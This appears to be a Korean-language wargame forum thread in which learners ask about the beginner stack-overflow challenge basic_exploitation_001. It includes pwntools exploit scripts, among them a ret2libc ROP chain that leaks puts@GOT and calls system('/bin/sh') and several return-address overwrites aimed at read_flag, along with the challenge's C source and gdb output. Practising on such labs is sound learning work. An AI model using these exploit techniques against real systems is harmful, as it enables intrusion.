basic_exploitation_001

basic_exploitation_001 문제를 ROP를 사용해서 풀어보고 있는데 의문점이 생겨서 올립니다. from pwn import * context.log_level = 'debug' #p = remote('host3.dreamhack.games', 15998) p= process('./basic_exploitation_001') e = ELF('./basic_exploitation_001') libc = ELF('/lib/i386-linux-gnu/libc.so.6') #libc = e.libc #binsh = 0xf7f3d0f5 puts_plt = e.plt['puts'] puts_got = e.got['puts'] main = e.symbols['main'] #dummy = b'AAAA' dummy = p32(0x0804864b) # pop ebp ; ret payload = b'A' * 0x84 + p32(puts_plt) payload += dummy payload += p32(puts_got) payload += p32(main) p.sendline(payload) puts = u32(p.recvn(4)) #print('payload1 : ', payload) print('puts : ', hex(puts)) libc_base = puts - libc.symbols['puts'] binsh = libc_base + 0x1bd0f5 #print('binsh : ' + str(p32(binsh))) system_plt = e.plt['system'] system = libc_base + libc.symbols['system'] payload = b'A' * 0x84 + p32(system_plt) payload += dummy payload += p32(binsh) p.sendline(payload) p.interactive() payload를 작성할 때, ret 주소를 덮어 씌운 다음에 4bytes가 저는 argv[0] 가 들어가있는 자리인줄 알고, dummy로 덮은 다음에 함수 인자 값을 넣어줬습니다. 그런데, 계속 안풀려서, rop gadget 아무거나 찾아서 dummy 자리에 넣어보니까 바로 풀렸습니다. 저 ret 다음 4bytes 공간에 ret 가젯을 안 넣어도 첫 페이로드로 puts got값이 leak이 되는거 보면 dummy를 넣어도 우회가 된다는 소리 같은데, system 함수 호출할 때, ret 가젯을 안넣으면 정상적으로 실행이 안되는 이유를 모르겠습니다. gdb를 통해서 하드코딩한 binsh 값이랑 libc_base leak을 해서 구한 binsh값이랑 동일하게 나옵니다.

payload를 제출한 후에 read_flag 함수가 실행되면서 flag가 출력이 되기 때문에 p = remote('','') p = remote('') .. 생략 .. flag = p.recvline() print(flag) 이렇게 했는데 Traceback (most recent call last): File "ex.py", line 12, in <module> flag = p.recvline() File "/usr/local/lib/python3.8/dist-packages/pwnlib/tubes/tube.py", line 496, in recvline return self.recvuntil(self.newline, drop = not keepends, timeout = timeout) File "/usr/local/lib/python3.8/dist-packages/pwnlib/tubes/tube.py", line 339, in recvuntil res = self.recv(timeout=self.timeout) File "/usr/local/lib/python3.8/dist-packages/pwnlib/tubes/tube.py", line 104, in recv return self._recv(numb, timeout) or b'' File "/usr/local/lib/python3.8/dist-packages/pwnlib/tubes/tube.py", line 174, in _recv if not self.buffer and not self._fillbuffer(timeout): File "/usr/local/lib/python3.8/dist-packages/pwnlib/tubes/tube.py", line 153, in _fillbuffer data = self.recv_raw(self.buffer.get_fill_size()) File "/usr/local/lib/python3.8/dist-packages/pwnlib/tubes/sock.py", line 56, in recv_raw raise EOFError EOFError 이렇게 오류가 발생했습니다. 어차피 입력을 받아오는것인데 왜 오류가 발생하는건가요?? 찾아보니 프로세스에서 데이터를 보내지 않는다고 하긴 합니다만.. 혹시 stdout과 관련이 있는건 아닌가 조심스럽게 추측해 보겠습니다.

❯ python PoC.py [+] Starting local process './basic_exploitation_001': pid 104804 [*] Switching to interactive mode cat: flag: No such file or directory [*] Got EOF while reading in interactive $ [*] Process './basic_exploitation_001' stopped with exit code -11 (SIGSEGV) (pid 104804) [*] Got EOF while sending in interactive 이와 같이 제 로컬 PC에서 스택버퍼오버플로우를 이용해 read_flag 함수를 동작시켰습니다. 그러나, cat: flag: No such file or directory이라는 에러가 발생했습니다. ❯ cat /flag test 하지만 로컬PC에서 임의의 데이터를 삽입한 /flag는 존재하는데, 해당 파일을 못 읽어오는게 의문이 생깁니다. #include <stdio.h> #include <stdlib.h> #include <signal.h> #include <unistd.h> void alarm_handler() { puts("TIME OUT"); exit(-1); } void initialize() { setvbuf(stdin, NULL, _IONBF, 0); setvbuf(stdout, NULL, _IONBF, 0); signal(SIGALRM, alarm_handler); alarm(30); } void read_flag() { system("cat /flag"); } int main(int argc, char *argv[]) { char buf[0x80]; initialize(); gets(buf); read_flag(); return 0; } 그래서 로컬PC의 환경적 요인 때문에 안된다는 생각이 들어, 문제 코드의 main 함수에 read_flag 함수를 호출해봤습니다. ❯ gcc -g -fno-stack-protector -o test test.c test.c: In function ‘main’: test.c:32:5: warning: implicit declaration of function ‘gets’; did you mean ‘fgets’? [-Wimplicit-function-declaration] 32 | gets(buf); | ^ | fgets /usr/bin/ld: /tmp/ccpgL4yb.o: in function `main': /hack/wargame/lv1_basic_exploitation_001/test.c:32:(.text+0xd3): warning: the `gets' function is dangerous and should not be used. ❯ ./test test 컴파일 후 동작을 시켜보면 /flag 파일을 잘 가져오는 것을 확인할 수 있습니다. 왜 문제에서 제공된 basic_exploitation_001에서만 임의의 생성한 /flag 파일을 못 가져오나요?? 파일 권한 및 사용자 권한 ❯ ls -al basic_exploitation_001 test -rwxr-xr-x 1 root root 5912 2월 13 2024 basic_exploitation_001 -rwxr-xr-x 1 root root 19504 2월 28 03:06 test ❯ ls -al /flag -rw-r--r-- 1 root root 5 2월 28 01:17 /flag ❯ id uid=0(root) gid=0(root) groups=0(root) `

message=b'A'*0x84+p32(0x80485b9) p.sendline(message) 이렇게 해서 일단 답은 나오긴했는데... 너무 궁금한게 그럼 message가 대충 b'AAAA....Ax/b9\x85\x04\x08' 이렇게 되는데,,, 왜 return address 부분만 리틀 엔디안으로 바꾸나요..? 바꿀거면 아예 통으로 바꿔서 x/b9\x85\x04\x08b'AAAA....A 이런식으로 저장되어야 리틀 엔디안으로 저장해서 리턴주소가 스택의 가장 아래(주소 높은 부분)로 가지 않나요..? ㅠㅠㅠ

어찌 어찌 문제는 풀었습니다. 그런데 처음에 gdb info function을 통해 read_flag의 주소를 입력해도 접속이 안되어 찾아보니 주소가 다르게 나오는 겁니다. 여기에 주소를 쓸 수는 없고 정답주소보다 80만큼 큰 주소가 read_flag의 주소로 표시됩니다. (모든 함수의 주소가 다른 사람들과 다르게 나옵니다.) 어떤 부분에서 오류가 발생하여 전체적인 주소가 다르게 나온건지 모르겠습니다...ㅜㅜ

그냥 print read_flag 할때는 주소가 0x8e2로 뜨는데 pwndbg> print read_flag $1 = {<text variable, no debug info>} 0x8e2 <read_flag> run 하고 다시 구해보면 pwndbg> print read_flag $2 = {<text variable, no debug info>} 0x5555555548e2 <read_flag> 이렇게뜨는데 차이가 뭔가요 그리고 둘다 주소로 해서 해봐도 /cat flag가 실행이 안되는데 다른 주소가 있는건가요

pwndbg> checksec [*] '/home/kali/basic2' Arch: i386-32-little RELRO: No RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 보안 해제도 똑같이 해주고 pwndbg> print read_flag $1 = {<text variable, no debug info>} 0x80485fb <read_flag> read_flag주소도 찾아서 넣었는데 from pwn import * r = remote('host1.dreamhack.games', 18560) read_addr = 0x80485fb buf = b'A'*128 fsp = b'A'*4 payload = buf payload += fsp payload += p32(read_addr) r.send(payload) r.interactive() 안되는데 이유가뭔가요 그리고 char buf[0x80]이라고 나와있는데 gdb로보면 call부르기전에 보면 ebp-0x80 이 아니라 ebp-0x88만큼 해주는데 뭔가요 0x08048643 <+29>: call 0x8048594 <initialize> 0x08048648 <+34>: sub esp,0xc 0x0804864b <+37>: lea eax,[ebp-0x88] 0x08048651 <+43>: push eax 0x08048652 <+44>: call 0x80483c0 <gets@plt> (수정) ebp-0x88은 문제파일 안쓰고 환경 직접 만드느라 실수했나봐요 문제파일쓰니깐 ebp-0x80나오네요 죄송;

image.png 오류 image.png p32는 int형만 먹는다는데 어떻게 바꿔주어야 오류가 안나오나요?

read_flag 함수를 이용하여 풀긴 했는데 궁금증이 있어서 질문드립니다. 드림핵 RTL 강의에 있는 방법대로 system 함수의 주소와 "/bin/sh"문자열 주소를 획득하여버퍼로 넣어주고, system 함수로 뛰는 것과 함수 내부에서 eax 레지스터에 /bin/sh 문자열 포인터까지 제대로 들어가는 것을 확인했는데, 강의에서의 example1.c 파일과 다르게 sh이 실행이 되질 않네요. 이유가 궁금합니다.

근데 이번 문제같은 경우에는 SFP를 계산해서 풀었는데, 저번에 다른 쉬운 문제에서는 SFP를 계산하지 않아도 됐었던 걸로 기억해서요 주로 어떤 상황일 때 계산해야하나요?